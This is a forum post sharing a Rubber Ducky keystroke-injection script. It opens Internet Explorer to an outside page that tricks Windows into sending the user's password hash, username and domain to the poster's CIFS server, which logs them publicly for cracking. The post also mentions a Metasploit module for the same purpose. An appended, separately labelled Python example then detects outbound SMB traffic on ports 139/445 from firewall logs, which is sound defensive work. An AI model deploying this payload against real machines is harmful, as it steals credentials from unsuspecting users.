[Payload] First simple script


bwall

I got a Rubber Ducky for xmas, and figured I would start with a simple script before I went into encoded binaries. So as far as useful, I figured I would use a testing file I have up on my server which tricks IE into trying to connect to a fake CIFS server, sending a double salted hash of the user's password on the Windows box, along with the username and domain.

This information is then dumped to a web readable file.

DELAY 1000
CONTROL ESCAPE
DELAY 50
STRING iexplore.exe http://firebwall.com/test.html
ENTER
DELAY 2000
ALT f
STRING x
REM http://firebwall.com/hashlog.txt will show the exchange that you can run password cracking on

I have a custom CIFS server up, but there is a Metasploit module you can run on your own. If you do not wish to make your IP, password hash, username and domain publicly available, do not go to test.html with anything other than wget or curl.
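
A defensive counterpart to the payload above, added here as an example and not part of the original post: the script only works if the workstation can open a CIFS session to a server outside the network, so internal-to-external traffic on TCP 139/445 is what to alert on and block at the perimeter. The log format, field order, internal address ranges and sample lines are constructed assumptions.

```python
import ipaddress

SMB_PORTS = {139, 445}  # NetBIOS session service and SMB/CIFS over TCP

# Address space treated as "inside" (assumption: RFC 1918, loopback, link-local).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]

# Constructed sample log. Assumed format: time,src,dst,dst_port,proto,action
SAMPLE_LOG = """\
2013-01-02T10:15:01Z,10.0.4.23,10.0.0.5,445,tcp,allow
2013-01-02T10:15:07Z,10.0.4.23,203.0.113.77,80,tcp,allow
2013-01-02T10:15:08Z,10.0.4.23,203.0.113.77,445,tcp,allow
2013-01-02T10:15:09Z,10.0.4.31,198.51.100.9,139,tcp,deny
malformed line
2013-01-02T10:16:00Z,10.0.4.23,192.168.1.10,139,tcp,allow
"""

def is_internal(ip):
    return any(ip in net for net in INTERNAL_NETS)

def external_smb_attempts(log_text):
    """Return internal-to-external TCP 139/445 connection records."""
    findings = []
    for line in log_text.splitlines():
        fields = [f.strip() for f in line.split(",")]
        if len(fields) != 6:
            continue  # skip malformed lines
        ts, src, dst, port, proto, action = fields
        try:
            src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
            dport = int(port)
        except ValueError:
            continue  # skip unparseable addresses or ports
        if proto.lower() != "tcp" or dport not in SMB_PORTS:
            continue
        if is_internal(src_ip) and not is_internal(dst_ip):
            findings.append({"time": ts, "src": src, "dst": dst,
                             "port": dport, "action": action.lower()})
    return findings

def hosts_needing_reset(findings):
    """Sources whose SMB session was allowed out: treat the exchange as crackable offline."""
    return sorted({f["src"] for f in findings if f["action"] == "allow"})

if __name__ == "__main__":
    hits = external_smb_attempts(SAMPLE_LOG)
    for h in hits:
        print(h)
    print("credentials to rotate for:", hosts_needing_reset(hits))
```

A denied record still matters: it shows a host attempted the connection even though the perimeter stopped it.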
